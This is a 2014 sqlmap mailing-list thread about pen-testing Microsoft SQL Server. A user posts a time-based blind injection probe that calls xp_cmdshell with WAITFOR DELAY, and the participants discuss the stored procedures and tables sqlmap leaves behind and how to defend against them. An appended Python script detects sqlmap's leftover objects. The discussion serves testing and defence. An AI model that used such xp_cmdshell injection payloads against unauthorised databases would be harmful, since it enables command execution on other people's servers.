>>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>>
>>>> But it just waits 5 seconds. Any idea why this happens?
From: Miroslav S. <mir...@gm...> - 2014-12-07 19:32:55
You have to redirect output to an output file and read it afterwards. xp_cmdshell by itself doesn't return anything other than the return code.

Bye

On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
> You don't need just to have it activated? You say I can't run the EXEC? Any other way to avoid it?
>
> Is there anything I can do? Humm. It comes to mind to impersonate another user and pray they can do this.
>
> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>> No execution rights?
>>
>> Bye
>>
>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>>> Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.
>>>
>>> In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:
>>>
>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>
>>> But it just waits 5 seconds. Any idea why this happens?
From: Rodrigo Z. S. <rod...@gm...> - 2014-12-07 19:31:27
You don't need just to have it activated? You say I can't run the EXEC? Any other way to avoid it?

Is there anything I can do? Humm. It comes to mind to impersonate another user and pray they can do this.

2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
> No execution rights?
>
> Bye
>
> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
>> Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.
>>
>> In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:
>>
>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>
>> But it just waits 5 seconds. Any idea why this happens?
From: Miroslav S. <mir...@gm...> - 2014-12-07 19:25:33
No execution rights?

Bye

On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <rod...@gm...> wrote:
> Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.
>
> In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:
>
> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>
> But it just waits 5 seconds. Any idea why this happens?
From: Rodrigo Z. S. <rod...@gm...> - 2014-12-07 17:19:33
Hi. I am doing a pen test on Microsoft SQL Server 2008 R2 and I can see that xp_cmdshell is active.

In the table *master.sys.configurations*, the column *value_in_use* shows it is 1, so it is active!! But every command that I tried to use didn't return any value. I just tried the most obvious:

DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'

But it just waits 5 seconds. Any idea why this happens?
From: Rodrigo Z. S. <rod...@gm...> - 2014-12-07 17:05:10
It creates the "sqlmapfile" TABLE. I was in shock when I saw that this was in the server because it gives a huge way to discover a vulnerability.

2014-12-07 15:02 GMT-02:00 Rodrigo Zanatta Silva <rod...@gm...>:
> I already see that when trying to read a file in Microsoft SQL Server it creates a "sqlmapfile" and doesn't drop it in the end. This is not a smart thing to do.
>
> By the way, I already tried to read any file using sqlmap and none worked. I see some absolute paths in the server but without success until now.
>
> Any idea of a single file that I can read just to see that it is working? Any common file in Microsoft SQL Server 2008 R2?
>
> 2014-12-05 19:30 GMT-02:00 Robin Wood <ro...@di...nja>:
>> Fair enough, all valid points. I'd not looked at the fixed table names till looking at cleanup so hadn't thought about any of it before.
>>
>> Robin
>>
>> On 5 December 2014 at 21:27, Miroslav Stampar <mir...@gm...> wrote:
>>> Well, if you think like that, used auxiliary table names are also static (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names and proc names for defensive purposes just like that around will only create panic. Also, non-skiddy will easily detect that there is already a proc/table name with the same name causing the problem and he will easily adapt either sqlmap or drop older entities (e.g. via --cleanup).
>>>
>>> Why wouldn't you revoke privileges for creating of tables and/or procedures for defensive purposes rather than laying around sqlmap... inside database?
>>>
>>> Bye
>>>
>>> On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
>>>> Does this mean as a defence we could create a procedure with the same name which would block the creation?
>>>>
>>>> Robin
>>>>
>>>> On 5 December 2014 at 21:14, Miroslav Stampar <mir...@gm...> wrote:
>>>>> Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for cleanup in further runs)
>>>>>
>>>>> Bye
>>>>>
>>>>> On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
>>>>>> Sorry, somehow sent early, was trying to ask, is the name still dynamic or is it now just a fixed name?
>>>>>>
>>>>>> Robin
>>>>>>
>>>>>> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
>>>>>>> OK, I've got a lab I can test it in later tonight.
>>>>>>>
>>>>>>> When you say not random, is it still dynamic va
>>>>>>>
>>>>>>> On 5 December 2014 at 21:03, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>> Hi.
>>>>>>>>
>>>>>>>> Just made a patch. Not around a testing environment to test it out, but now it should work (new proc name is not randomly generated from now on so it could be properly deleted afterwards).
>>>>>>>>
>>>>>>>> Bye
>>>>>>>>
>>>>>>>> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>>> Will check this out in an hour or so. At first glance I can see that we have to make a patch for MsSQL.
>>>>>>>>>
>>>>>>>>> Bye
>>>>>>>>>
>>>>>>>>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>>> Looking at the commands sent I can see three drop tables for sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored procedures.
>>>>>>>>>>
>>>>>>>>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>>>> Just spotted --cleanup but that didn't remove the procedure, sqlmap command seemed to run OK though but didn't say anything about what it was removing, should it have done?
>>>>>>>>>>>
>>>>>>>>>>> Robin
>>>>>>>>>>>
>>>>>>>>>>> On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>>>>> I'm testing sqlmap against an MSSQL DB and looking at running OS commands. In an attempt to reenable xp_cmdshell a stored proc called xp_gedp has been created and left behind, is there any way to automatically clean up this and any other things that are created?
>>>>>>>>>>>>
>>>>>>>>>>>> Robin
>>>>>>>>>
>>>>>>>>> --
>>>>>>>>> Miroslav Stampar
>>>>>>>>> http://about.me/stamparm
>>>>>>>>
>>>>>>>> --
>>>>>>>> Miroslav Stampar
>>>>>>>> http://about.me/stamparm
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
From: Rodrigo Z. S. <rod...@gm...> - 2014-12-07 17:02:35
|
I already see that when trying to read a file in Microsoft SQL Server it creates a "sqlmapfile" and didn't drop it at the end. This is not a smart thing to do. By the way, I already tried to read any file using the sqlmap and none worked. I see some absolute path in the server but without success until now. Any idea from a single file that I can read just to see that it is working? Any common file in the Microsoft SQL Server 2008 R2?

2014-12-05 19:30 GMT-02:00 Robin Wood <ro...@di...nja>:
> Fair enough, all valid points. I'd not looked at the fixed table names
> till looking at cleanup so hadn't thought about any of it before.
>
> Robin
>
> On 5 December 2014 at 21:27, Miroslav Stampar <mir...@gm...> wrote:
>> Well, if you think like that, used auxiliary table names are also static
>> (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names and
>> proc names for defensive purposes just like that around will only create
>> panic. Also, non-skiddy will easily detect that there is already a
>> proc/table name with the same name causing the problem and he will easily
>> adapt either sqlmap or drop older entities (e.g. via --cleanup).
>>
>> Why wouldn't you revoke privileges for creating of tables and/or procedures
>> for defensive purposes rather than laying around sqlmap... inside database?
>>
>> Bye
>>
>> On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
>>> Does this mean as a defence we could create a procedure with the same
>>> name which would block the creation?
>>>
>>> Robin
>>>
>>> On 5 December 2014 at 21:14, Miroslav Stampar <mir...@gm...> wrote:
>>>> Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
>>>> cleanup in further runs)
>>>>
>>>> Bye
>>>>
>>>> On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
>>>>> Sorry, somehow sent early, was trying to ask, is the name still
>>>>> dynamic or is it now just a fixed name?
>>>>>
>>>>> Robin
>>>>>
>>>>> On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
>>>>>> OK, I've got a lab I can test it in later tonight.
>>>>>>
>>>>>> When you say not random, is it still dynamic va
>>>>>>
>>>>>> On 5 December 2014 at 21:03, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>> Hi.
>>>>>>>
>>>>>>> Just made a patch. Not around a testing environment to test it out, but
>>>>>>> now it should work (new proc name is not randomly generated from now on
>>>>>>> so it could be properly deleted afterwards).
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>> Will check this out in an hour or so. At first glance I can see that
>>>>>>>> we have to make a patch for MsSQL.
>>>>>>>>
>>>>>>>> Bye
>>>>>>>>
>>>>>>>> On Thu, Dec 4, 2014 at 4:11 PM, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>> Looking at the commands sent I can see three drop tables for
>>>>>>>>> sqlmapfile, sqlmapfilehex and sqlmapoutput but nothing for stored
>>>>>>>>> procedures.
>>>>>>>>>
>>>>>>>>> On 4 December 2014 at 15:08, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>>> Just spotted --cleanup but that didn't remove the procedure,
>>>>>>>>>> sqlmap command seemed to run OK though but didn't say anything about
>>>>>>>>>> what it was removing, should it have done?
>>>>>>>>>>
>>>>>>>>>> Robin
>>>>>>>>>>
>>>>>>>>>> On 4 December 2014 at 15:01, Robin Wood <ro...@di...nja> wrote:
>>>>>>>>>>> I'm testing sqlmap against an MSSQL DB and looking at running OS
>>>>>>>>>>> commands. In an attempt to reenable xp_cmdshell a stored proc called
>>>>>>>>>>> xp_gedp has been created and left behind, is there any way to
>>>>>>>>>>> automatically clean up this and any other things that are created?
>>>>>>>>>>>
>>>>>>>>>>> Robin
|
From: Robin W. <ro...@di...> - 2014-12-05 21:31:19
|
Fair enough, all valid points. I'd not looked at the fixed table names till looking at cleanup so hadn't thought about any of it before.

Robin

On 5 December 2014 at 21:27, Miroslav Stampar <mir...@gm...> wrote:
> Well, if you think like that, used auxiliary table names are also static
> (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names and
> proc names for defensive purposes just like that around will only create
> panic. Also, non-skiddy will easily detect that there is already a
> proc/table name with the same name causing the problem and he will easily
> adapt either sqlmap or drop older entities (e.g. via --cleanup).
>
> Why wouldn't you revoke privileges for creating of tables and/or procedures
> for defensive purposes rather than laying around sqlmap... inside database?
>
> Bye
|
From: Miroslav S. <mir...@gm...> - 2014-12-05 21:27:28
|
Well, if you think like that, used auxiliary table names are also static (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table names and proc names for defensive purposes just like that around will only create panic. Also, non-skiddy will easily detect that there is already a proc/table name with the same name causing the problem and he will easily adapt either sqlmap or drop older entities (e.g. via --cleanup).

Why wouldn't you revoke privileges for creating of tables and/or procedures for defensive purposes rather than laying around sqlmap... inside database?

Bye

On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
> Does this mean as a defence we could create a procedure with the same
> name which would block the creation?
>
> Robin

--
Miroslav Stampar
http://about.me/stamparm
|
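Robin's question (block creation by pre-creating a same-named procedure) and Miroslav's answer (revoke the application login's right to create tables and procedures) can both be checked from the defender's side. The script below is an added example, not sqlmap's code nor anything posted in the thread: it scans constructed T-SQL statement log lines for the object names the thread mentions (sqlmapfile, sqlmapfilehex, sqlmapoutput, xp_gedp, new_xp_cmdshell), reports what was created and never dropped (the failure mode Robin hit with --cleanup), and emits the catalog hunt query and the DENY statements Miroslav suggests; the log line format and the `app_user` login are assumptions.

```python
"""Defender-side check for sqlmap's MSSQL auxiliary objects (added example).

The thread reports that sqlmap creates helper tables (sqlmapfile, sqlmapfilehex,
sqlmapoutput) and a stored procedure (a random name such as xp_gedp before the
patch, "new_xp_cmdshell" after it) and that --cleanup dropped the tables but not
the procedure.  This script pairs CREATE with DROP in a statement log and flags
whatever was left behind, then produces the catalog hunt query and the
privilege DENYs Miroslav suggests.  Log lines below are constructed, not real.
"""
import re

# Names taken from the thread; "xp_gedp" is one instance of the pre-patch
# random name, so callers can pass further names seen in their own logs.
KNOWN_TABLES = {"sqlmapfile", "sqlmapfilehex", "sqlmapoutput"}
KNOWN_PROCS = {"xp_gedp", "new_xp_cmdshell"}

# CREATE/DROP TABLE|PROCEDURE|PROC <name>, tolerating an optional schema prefix
# and [bracket] quoting as they appear in SQL Server statement logs.
STMT_RE = re.compile(
    r"\b(?P<verb>CREATE|DROP)\s+(?P<kind>TABLE|PROCEDURE|PROC)\s+"
    r"(?:\[?\w+\]?\.)?\[?(?P<name>\w+)\]?",
    re.IGNORECASE,
)

# Constructed statement log (assumed format: timestamp, login, statement).
SAMPLE_LOG = [
    "2014-12-04 15:00:01 app_user CREATE TABLE sqlmapoutput (data varchar(8000))",
    "2014-12-04 15:00:02 app_user CREATE TABLE dbo.sqlmapfile (data varchar(8000))",
    "2014-12-04 15:00:02 app_user CREATE TABLE [dbo].[sqlmapfilehex] (id int, data varchar(8000))",
    "2014-12-04 15:00:03 app_user CREATE PROCEDURE xp_gedp @cmd varchar(8000) AS ...",
    "2014-12-04 15:08:10 app_user DROP TABLE sqlmapfile",
    "2014-12-04 15:08:10 app_user DROP TABLE sqlmapfilehex",
    "2014-12-04 15:08:11 app_user DROP TABLE sqlmapoutput",
    "2014-12-04 15:09:00 app_user CREATE TABLE orders (id int)",  # unrelated, ignored
]


def classify(line, procs):
    """Return (verb, kind, name) for a CREATE/DROP of a sqlmap object, else None."""
    m = STMT_RE.search(line)
    if not m:
        return None
    verb = m.group("verb").upper()
    kind = "PROC" if m.group("kind").upper().startswith("PROC") else "TABLE"
    name = m.group("name").lower()
    if kind == "TABLE" and name in KNOWN_TABLES:
        return verb, kind, name
    if kind == "PROC" and name in procs:
        return verb, kind, name
    return None


def find_leftovers(log_lines, extra_proc_names=()):
    """Map name -> kind for sqlmap objects that were created but never dropped.

    A CREATE followed later by a DROP of the same name counts as cleaned up;
    re-creation after a DROP makes it live again.  Statement order is assumed
    to be chronological, as in an exported audit.
    """
    procs = KNOWN_PROCS | {n.lower() for n in extra_proc_names}
    live = {}
    for line in log_lines:
        hit = classify(line, procs)
        if hit is None:
            continue
        verb, kind, name = hit
        if verb == "CREATE":
            live[name] = kind
        else:
            live.pop(name, None)
    return live


def hunt_query(extra_proc_names=()):
    """T-SQL to look for the same objects directly in the database catalog."""
    names = sorted(KNOWN_TABLES | KNOWN_PROCS | {n.lower() for n in extra_proc_names})
    quoted = ", ".join("'%s'" % n for n in names)
    return ("SELECT name, type_desc, create_date FROM sys.objects "
            "WHERE name IN (%s);" % quoted)


def deny_statements(principal):
    """Database-level DENYs that stop the application login from creating the
    objects in the first place (Miroslav's suggestion in the thread)."""
    return ["DENY CREATE TABLE TO [%s];" % principal,
            "DENY CREATE PROCEDURE TO [%s];" % principal]


if __name__ == "__main__":
    for name, kind in find_leftovers(SAMPLE_LOG).items():
        print("left behind: %s %s" % (kind, name))
    print(hunt_query())
    print("\n".join(deny_statements("app_user")))
```

Run against the constructed log it reports only the procedure as left behind, matching Robin's observation; feed it an exported SQL Server audit instead of SAMPLE_LOG to check a real instance.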
From: Robin W. <ro...@di...> - 2014-12-05 21:20:01
|
Does this mean as a defence we could create a procedure with the same name which would block the creation?

Robin

On 5 December 2014 at 21:14, Miroslav Stampar <mir...@gm...> wrote:
> Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for
> cleanup in further runs)
>
> Bye
|
From: Miroslav S. <mir...@gm...> - 2014-12-05 21:14:36
|
Now it is "new_xp_cmdshell" so no more random/dynamic names (easier for cleanup in further runs)

Bye

On Fri, Dec 5, 2014 at 10:08 PM, Robin Wood <ro...@di...nja> wrote:
> Sorry, somehow sent early, was trying to ask, is the name still
> dynamic or is it now just a fixed name?
>
> Robin

--
Miroslav Stampar
http://about.me/stamparm
|
From: Robin W. <ro...@di...> - 2014-12-05 21:09:02
|
Sorry, somehow sent early, was trying to ask, is the name still dynamic or is it now just a fixed name?

Robin

On 5 December 2014 at 21:07, Robin Wood <ro...@di...nja> wrote:
> OK, I've got a lab I can test it in later tonight.
>
> When you say not random, is it still dynamic va
|
From: Robin W. <ro...@di...> - 2014-12-05 21:07:55
|
OK, I've got a lab I can test it in later tonight.

When you say not random, is it still dynamic va

On 5 December 2014 at 21:03, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Just made a patch. Not around a testing environment to test it out, but now
> it should work (new proc name is not randomly generated from now on so it
> could be properly deleted afterwards).
>
> Bye
|
From: Miroslav S. <mir...@gm...> - 2014-12-05 21:04:03
|
Hi.

Just made a patch. Not around a testing environment to test it out, but now it should work (new proc name is not randomly generated from now on so it could be properly deleted afterwards).

Bye

On Fri, Dec 5, 2014 at 11:56 AM, Miroslav Stampar <mir...@gm...> wrote:
> Will check this out in an hour or so. At first glance I can see that we
> have to make a patch for MsSQL.
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
|